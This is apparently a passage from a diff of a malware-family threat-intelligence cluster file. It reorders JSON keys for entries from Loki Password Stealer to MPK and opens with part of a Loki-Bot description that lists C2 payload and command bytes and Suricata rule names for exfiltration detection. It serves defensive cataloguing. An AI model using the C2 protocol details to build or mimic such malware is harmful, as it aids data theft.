WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:\r\n\r\nBYTE\tPAYLOAD TYPE\r\n0x26\tStolen Cryptocurrency Wallet\r\n0x27\tStolen Application Data\r\n0x28\tGet C2 Commands from C2 Server\r\n0x29\tStolen File\r\n0x2A\tPOS (Point of Sale?)\r\n0x2B\tKeylogger Data\r\n0x2C\tScreenshot\r\n\r\nThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically “ckav.ru”. 
If you come across a Binary ID that is different from this, take note!\r\n\r\nLoki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.\r\n\r\nThe Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot’s C2 infrastructure.\r\n\r\nLoki-Bot can accept the following instructions from the C2 Server:\r\n\r\nBYTE\tINSTRUCTION DESCRIPTION\r\n0x00\tDownload EXE & Execute\r\n0x01\tDownload DLL & Load #1\r\n0x02\tDownload DLL & Load #2\r\n0x08\tDelete HDB File\r\n0x09\tStart Keylogger\r\n0x0A\tMine & Steal Data\r\n0x0E\tExit Loki-Bot\r\n0x0F\tUpgrade Loki-Bot\r\n0x10\tChange C2 Polling Frequency\r\n0x11\tDelete Executables & Exit\r\n\r\nSuricata Signatures\r\nRULE SID\tRULE NAME\r\n2024311\tET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected\r\n2024312\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1\r\n2024313\tET TROJAN Loki Bot Request for C2 Commands Detected M1\r\n2024314\tET TROJAN Loki Bot File Exfiltration Detected\r\n2024315\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1\r\n2024316\tET TROJAN Loki Bot Screenshot Exfiltration Detected\r\n2024317\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2\r\n2024318\tET TROJAN Loki Bot Request for C2 Commands Detected M2\r\n2024319\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2" + "value": "Loki Password Stealer (PWS)" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.luminosity_rat", "https://researchcenter.paloaltonetworks.com/2016/07/unit42-investigating-the-luminositylink-remote-access-trojan-configuration/", 
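Review bot: The Luminosity RAT entry started at the end of this hunk keeps `"description": ""` as an empty string, and the Loki entry above it keeps `"type": []`, so the reorder preserves empty-value sentinels rather than omitting fields whose value is unknown. If the cluster schema treats description, synonyms and type as optional, dropping the empty values would be the more consistent policy and would let consumers distinguish "no description" from "empty description"; if the schema requires them, a one-line note in the cluster's README saying so would stop a later sorting pass from second-guessing it. The same pattern recurs throughout the following hunk (Lurk, Luzo, Machete and others), so whichever policy is chosen should be applied file-wide in one go. The Luminosity RAT object and its refs array continue past the end of this hunk.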
@@ -9067,1039 +9069,1037 @@ "https://umbrella.cisco.com/blog/2017/01/18/finding-the-rats-nest/", "http://malwarenailed.blogspot.com/2016/07/luminosity-rat-re-purposed.html", "https://krebsonsecurity.com/2018/07/luminositylink-rat-author-pleads-guilty/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e145863e-f3bd-489c-91f6-0c2b7e9cc59a", - "value": "Luminosity RAT", - "description": "" + "value": "Luminosity RAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lurk", "https://www.secureworks.com/research/malware-analysis-of-the-lurk-downloader" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "929112e4-e252-4273-b3c2-fd414cfb2776", - "value": "Lurk", - "description": "" + "value": "Lurk" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.luzo" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8c0d3012-9dcb-46d3-964f-8a3c5b58d1b2", - "value": "Luzo", - "description": "" + "value": "Luzo" }, { + "description": "", "meta": { - "synonyms": [ - "Lucky Locker", - "Adneukine", - "Bomba Locker" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lyposit", "https://blog.avast.com/2013/05/20/lockscreen-win32lyposit-displayed-as-a-fake-macos-app/", "http://malware.dontneedcoffee.com/2012/11/inside-view-of-lyposit-aka-for-its.html", "http://malware.dontneedcoffee.com/2013/05/unveiling-locker-bomba-aka-lucky-locker.html" - ] + ], + "synonyms": [ + "Lucky Locker", + "Adneukine", + "Bomba Locker" + ], + "type": [] }, "uuid": "0dea3e9d-b443-40f6-a9e0-ba622850ee8a", - "value": "Lyposit", - "description": "" + "value": "Lyposit" }, { + "description": "", "meta": { - "synonyms": [ - "El Machete" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.machete", "https://securelist.com/el-machete/66108/", 
"https://www.cylance.com/en_us/blog/el-machete-malware-attacks-cut-through-latam.html", "https://medium.com/@verovaleros/el-machete-what-do-we-know-about-the-apt-targeting-latin-america-be7d11e690e6" - ] + ], + "synonyms": [ + "El Machete" + ], + "type": [] }, "uuid": "9a724a1d-7eb1-4e2b-8cc3-e1b41e8b5cff", - "value": "Machete", - "description": "" + "value": "Machete" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.madmax", "https://www.arbornetworks.com/blog/asert/mad-max-dga/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "42760c2c-bf00-4ace-871c-6dcbbd90b2de", - "value": "MadMax", - "description": "" + "value": "MadMax" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.magala", "https://securelist.com/the-magala-trojan-clicker-a-hidden-advertising-threat/78920/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "192f93bc-fcf6-4aaf-ae2f-d9435a67e48b", - "value": "Magala", - "description": "" + "value": "Magala" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.magniber", "https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/", "https://www.youtube.com/watch?v=lqWJaaofNf4", "http://asec.ahnlab.com/1124" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "fedac411-0638-48dc-8ac5-1b4171fa8a29", - "value": "Magniber", - "description": "" + "value": "Magniber" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.majik_pos", "http://blog.trendmicro.com/trendlabs-security-intelligence/majikpos-combines-pos-malware-and-rats/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c1144eb8-a2bc-48d7-b0fb-18f124c1f8d9", - "value": "MajikPos", - "description": "" + "value": "MajikPos" }, { + 
"description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.makadocs", "http://contagiodump.blogspot.com/2012/12/nov-2012-backdoorw32makadocs-sample.html", "https://www.symantec.com/connect/blogs/malware-targeting-windows-8-uses-google-docs" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "996e73e9-b093-4987-9992-f52008e55b24", - "value": "Makadocs", - "description": "" + "value": "Makadocs" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.makloader", "https://twitter.com/James_inthe_box/status/1046844087469391872" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "7e088669-3ddb-4cc5-bc9b-ae59f61ada82", - "value": "MakLoader", - "description": "" + "value": "MakLoader" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.maktub", "https://blog.malwarebytes.com/threat-analysis/2016/03/maktub-locker-beautiful-and-dangerous/", "https://bartblaze.blogspot.de/2018/04/maktub-ransomware-possibly-rebranded-as.html", "https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "bdb27944-1f79-46f7-a0d7-c344429790c2", - "value": "Maktub", - "description": "" + "value": "Maktub" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.malumpos", "http://documents.trendmicro.com/images/tex/pdf/MalumPOS%20Technical%20Brief.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "159b0dbf-52f6-4690-a545-0f890ba7b9b7", - "value": "MalumPOS", - "description": "" + "value": "MalumPOS" }, { + "description": "", "meta": { - "synonyms": [ - "HDDCryptor", - "DiskCryptor" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mamba", 
"http://blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/", "https://securelist.com/the-return-of-mamba-ransomware/79403/" - ] + ], + "synonyms": [ + "HDDCryptor", + "DiskCryptor" + ], + "type": [] }, "uuid": "df320366-7970-4af0-b1f4-9f9492dede53", - "value": "Mamba", - "description": "" + "value": "Mamba" }, { + "description": "", "meta": { - "synonyms": [ - "CryptoHost" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.manamecrypt", "https://www.bleepingcomputer.com/news/security/cryptohost-decrypted-locks-files-in-a-password-protected-rar-file/", "https://www.gdatasoftware.com/blog/2016/04/28234-manamecrypt-a-ransomware-that-takes-a-different-route" - ] + ], + "synonyms": [ + "CryptoHost" + ], + "type": [] }, "uuid": "54cd671e-b7e4-4dd3-9bfa-dc0ba5105944", - "value": "ManameCrypt", - "description": "" + "value": "ManameCrypt" }, { + "description": "", "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mangzamel", + "https://www.hybrid-analysis.com/sample/5d631d77401615d53f3ce3dbc2bfee5d934602dc35d488aa7cebf9b3ff1c4816?environmentId=2" + ], "synonyms": [ "junidor", "mengkite", "vedratve" ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.mangzamel", - "https://www.hybrid-analysis.com/sample/5d631d77401615d53f3ce3dbc2bfee5d934602dc35d488aa7cebf9b3ff1c4816?environmentId=2" - ] + "type": [] }, "uuid": "ed3a94c9-8a5a-4ae7-bdd9-b000e01df3a0", - "value": "Mangzamel", - "description": "" + "value": "Mangzamel" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.manifestus_ransomware", "https://twitter.com/struppigel/status/811587154983981056" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "5b75db42-b8f2-4e52-81d3-f329e49e1af2", - "value": "Manifestus", - "description": "" + "value": "Manifestus" }, { 
+ "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.manitsme", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "13b0d9ff-0be0-4539-8c86-dfca7a0e79f6", - "value": "ManItsMe", - "description": "" + "value": "ManItsMe" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mapiget", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8a97307f-a029-4c43-88e1-debed2b80b14", - "value": "MAPIget", - "description": "" + "value": "MAPIget" }, { + "description": "Marap is a downloader, named after its command and control (C&C) phone home parameter \"param\" spelled backwards. It is written in C and contains a few notable anti-analysis features.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.marap", "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-prepare-more-part-1-marap" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c2c3ac24-6921-4bba-a2c8-ac3d364feaeb", - "value": "Marap", - "description": "Marap is a downloader, named after its command and control (C&C) phone home parameter \"param\" spelled backwards. It is written in C and contains a few notable anti-analysis features." 
+ "value": "Marap" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_banker", "https://www.arbornetworks.com/blog/asert/another-banker-enters-matrix/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "59717468-271e-4d15-859a-130681c17ddb", - "value": "Matrix Banker", - "description": "" + "value": "Matrix Banker" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_ransom" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "118ced99-5942-497f-885a-2b25d0569b4b", - "value": "Matrix Ransom", - "description": "" + "value": "Matrix Ransom" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.matryoshka_rat", "http://www.clearskysec.com/tulip/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c8a7c6e7-c6d3-4978-8a1d-190162de5e0d", - "value": "Matryoshka RAT", - "description": "" + "value": "Matryoshka RAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.matsnu", "https://blog.checkpoint.com/wp-content/uploads/2015/07/matsnu-malwareid-technical-brief.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f566d597-d0c4-4932-b738-ac5774eedb7a", - "value": "Matsnu", - "description": "" + "value": "Matsnu" }, { + "description": " This ransomware modifies the master boot record of the victim's computer so that it shows a ransom note before Windows starts.", "meta": { - "synonyms": [ - "DexLocker" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mbrlock", "https://www.bleepingcomputer.com/news/security/dexcrypt-mbrlocker-demands-30-yuan-to-gain-access-to-computer/", "https://www.hybrid-analysis.com/sample/dfc56a704b5e031f3b0d2d0ea1d06f9157758ad950483b44ac4b77d33293cb38?environmentId=100", 
"https://app.any.run/tasks/0a7e643f-7562-4575-b8a5-747bd6b5f02d", "http://id-ransomware.blogspot.com.tr/2018/02/mbrlock-hax-ransomware.html" - ] + ], + "synonyms": [ + "DexLocker" + ], + "type": [] }, "uuid": "41177275-7e6d-4ebd-a4df-d2cc733f7791", - "value": "MBRlock", - "description": " This ransomware modifies the master boot record of the victim's computer so that it shows a ransom note before Windows starts." + "value": "MBRlock" }, { + "description": "", "meta": { - "synonyms": [ - "MyBios" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mebromi", "http://contagiodump.blogspot.com/2011/09/mebromi-bios-rootkit-affecting-award.html", "https://www.symantec.com/connect/blogs/bios-threat-showing-again", "http://www.theregister.co.uk/2011/09/14/bios_rootkit_discovered/", "https://www.webroot.com//blog/2011/09/13/mebromi-the-first-bios-rootkit-in-the-wild/" - ] + ], + "synonyms": [ + "MyBios" + ], + "type": [] }, "uuid": "342be00c-cf68-45a6-8f90-3a2d2d20bda6", - "value": "Mebromi", - "description": "" + "value": "Mebromi" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.medre", "http://contagiodump.blogspot.com/2012/06/medrea-autocad-worm-samples.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "243ae1f7-183e-4ea9-82cf-3353a0ef78f4", - "value": "Medre", - "description": "" + "value": "Medre" }, { + "description": "Medusa is a DDoS bot written in .NET 2.0. 
In its current incarnation its C&C protocol is based on HTTP, while its predecessor made use of IRC.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.medusa", "https://webcache.googleusercontent.com/search?q=cache:ZbKznF-dogcJ:https://www.toolbase.me/board/topic/10061-b-medusa-irc-ddos-botnet-bypass-cf-cookie-protections/", "https://news.drweb.com/show/?i=10302&lng=en", "https://www.arbornetworks.com/blog/asert/medusahttp-ddos-slithers-back-spotlight/", "https://zerophagemalware.com/2017/10/13/rig-ek-via-malvertising-drops-a-miner/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "237a1c2d-eb14-483d-9a2e-82f10b63ec06", - "value": "win.medusa", - "description": "Medusa is a DDoS bot written in .NET 2.0. In its current incarnation its C&C protocol is based on HTTP, while its predecessor made use of IRC." + "value": "win.medusa" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mewsei" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "48cb12ee-c60a-46cd-b376-39226027c616", - "value": "Mewsei", - "description": "" + "value": "Mewsei" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.miancha", "https://www.contextis.com//documents/30/TA10009_20140127_-_CTI_Threat_Advisory_-_The_Monju_Incident1.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "a3370013-6c47-422e-a4d4-1b86ee71e5e5", - "value": "Miancha", - "description": "" + "value": "Miancha" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.micrass", "https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "6c09cc53-7160-47c6-8df8-3e0d42deb5a6", - "value": "Micrass", - 
"description": "" + "value": "Micrass" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.microcin", "https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636/", "https://cdn.securelist.com/files/2017/09/Microcin_Technical_4PDF_eng_final_s.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "185d8b28-0179-4ec6-a3c8-201b1936b9aa", - "value": "Microcin", - "description": "" + "value": "Microcin" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.micropsia", "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/", "http://blog.talosintelligence.com/2017/06/palestine-delphi.html", "https://research.checkpoint.com/apt-attack-middle-east-big-bang/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b37f312f-a0b1-41a9-88ae-da2844c19cae", - "value": "Micropsia", - "description": "" + "value": "Micropsia" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mikoponi" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "87abb59d-0012-4d45-9e75-136372b25bf8", - "value": "Mikoponi", - "description": "" + "value": "Mikoponi" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.milkmaid", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "801d8a6a-b7ba-4557-af5d-1005e53145e2", - "value": "MILKMAID", - "description": "" + "value": "MILKMAID" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mimikatz", "https://github.com/gentilkiwi/mimikatz", " https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", 
"https://www.wired.com/story/how-mimikatz-became-go-to-hacker-tool/", "http://blog.gentilkiwi.com/securite/un-observateur-evenements-aveugle" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "588fb91d-59c6-4667-b299-94676d48b17b", - "value": "MimiKatz", - "description": "" + "value": "MimiKatz" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.miniasp", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "a4f8bacf-2076-4e00-863c-874cdd833a41", - "value": "MiniASP", - "description": "" + "value": "MiniASP" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirage", "https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "6f6da371-2d62-4245-9aa3-8570e39222ae", - "value": "Mirage", - "description": "" + "value": "Mirage" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.miragefox", "https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b3e89b03-c5af-41cd-88b8-e15335abbb30", - "value": "MirageFox", - "description": "" + "value": "MirageFox" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirai", "https://twitter.com/PhysicalDrive0/status/830070569202749440", "https://securelist.com/blog/research/77621/newish-mirai-spreader-poses-new-risks/", "https://www.incapsula.com/blog/new-mirai-variant-ddos-us-college.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "17e12216-a303-4a00-8283-d3fe92d0934c", - "value": "Mirai", - "description": "" + "value": "Mirai" 
}, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.misdat", "https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d1597713-fe7a-45bd-8b59-1a13c7e097d8", - "value": "Misdat", - "description": "" + "value": "Misdat" }, { + "description": "", "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.misfox" + ], "synonyms": [ "MixFox", "ModPack" ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.misfox" - ] + "type": [] }, "uuid": "b4c33277-ec15-4bb3-89ef-314ecfa100da", - "value": "Misfox", - "description": "" + "value": "Misfox" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.miuref" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4c786624-4a55-46e6-849d-b65552034235", - "value": "Miuref", - "description": "" + "value": "Miuref" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mm_core", "https://blogs.forcepoint.com/security-labs/mm-core-memory-backdoor-returns-bigboss-and-sillygoose" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "6363cc2f-08f1-47a0-adbf-5cf19ea89ffd", - "value": "MM Core", - "description": "" + "value": "MM Core" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mobi_rat", "https://blog.malwarebytes.com/threat-analysis/2017/07/malware-abusing-ffmpeg/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e33aa1f8-a631-4274-afe0-f2fd3426332e", - "value": "MobiRAT", - "description": "" + "value": "MobiRAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mocton" - ] + ], + "synonyms": [], + "type": [] }, 
"uuid": "7132c1de-9a3f-4f08-955f-ab6f7a09e17d", - "value": "Mocton", - "description": "" + "value": "Mocton" }, { + "description": "", "meta": { - "synonyms": [ - "straxbot" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.modpos", "https://www.fireeye.com/blog/threat-research/2015/11/modpos.html", "https://twitter.com/physicaldrive0/status/670258429202530306" - ] + ], + "synonyms": [ + "straxbot" + ], + "type": [] }, "uuid": "026d638b-cc51-4eff-97fc-d61215a1a70a", - "value": "ModPOS", - "description": "" + "value": "ModPOS" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.moker", "https://breakingmalware.com/malware/moker-part-1-dissecting-a-new-apt-under-the-microscope/", "https://breakingmalware.com/malware/moker-part-2-capabilities/", "http://blog.ensilo.com/moker-a-new-apt-discovered-within-a-sensitive-network", "https://blog.malwarebytes.com/threat-analysis/2017/04/elusive-moker-trojan/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "90a1a61e-3e69-4b92-ac11-9095ac2d9cf4", - "value": "Moker", - "description": "" + "value": "Moker" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mokes", "https://securelist.com/from-linux-to-windows-new-family-of-cross-platform-desktop-backdoors-discovered/73503/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "6d5a5357-4126-4950-b8c3-ee78b1172217", - "value": "Mokes", - "description": "" + "value": "Mokes" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mole", "https://www.proofpoint.com/us/threat-insight/post/adgholas-malvertising-campaign-using-astrum-ek-deliver-mole-ransomware", "https://www.cert.pl/en/news/single/mole-ransomware-analysis-and-decryptor/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": 
"aaeaf9ee-2f3d-4141-9d45-ec383ba8445f", - "value": "Mole", - "description": "" + "value": "Mole" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.molerat_loader", "http://www.clearskysec.com/iec/", "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/26000/PD26760/en_US/McAfee_Labs_Threat_Advisory_GazaCybergang.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b50408c3-6676-4d3f-8a97-9114c215b67a", - "value": "Molerat Loader", - "description": "" + "value": "Molerat Loader" }, { + "description": "", "meta": { - "synonyms": [ - "CoinMiner" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.monero_miner", "https://www.welivesecurity.com/2017/09/28/monero-money-mining-malware/" - ] + ], + "synonyms": [ + "CoinMiner" + ], + "type": [] }, "uuid": "c57a4168-cd09-4611-a665-bbcede80f42b", - "value": "Monero Miner", - "description": "" + "value": "Monero Miner" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.moonwind", "http://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8465177f-16c8-47fc-a4c8-f4c0409fe460", - "value": "MoonWind", - "description": "" + "value": "MoonWind" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.morphine" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "9de41613-7762-4a88-8e9a-4e621a127f32", - "value": "Morphine", - "description": "" + "value": "Morphine" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.morto", "http://contagiodump.blogspot.com/2011/08/aug-28-morto-tsclient-rdp-worm-with.html", 
"https://www.f-secure.com/weblog/archives/00002227.html", "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Worm:Win32/Morto.A" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c931dc7d-9373-4545-911c-ad5589670c40", - "value": "Morto", - "description": "" + "value": "Morto" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mosquito", "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf", "https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "663df641-d396-4e93-93bd-bb9609ceb0ba", - "value": "Mosquito", - "description": "" + "value": "Mosquito" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.moure" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "bd3468e4-5e00-46e6-a884-6eda1b246394", - "value": "Moure", - "description": "" + "value": "Moure" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mozart", "https://securitykitten.github.io/2015/01/11/the-mozart-ram-scraper.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "dde61acb-8c0f-4a3a-8450-96e233f2ddc1", - "value": "mozart", - "description": "" + "value": "mozart" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mpk", "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "a37c826a-bb30-49fb-952a-63b1cab366c3", - "value": "MPK", - "description": "" + "value": "MPK" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ 
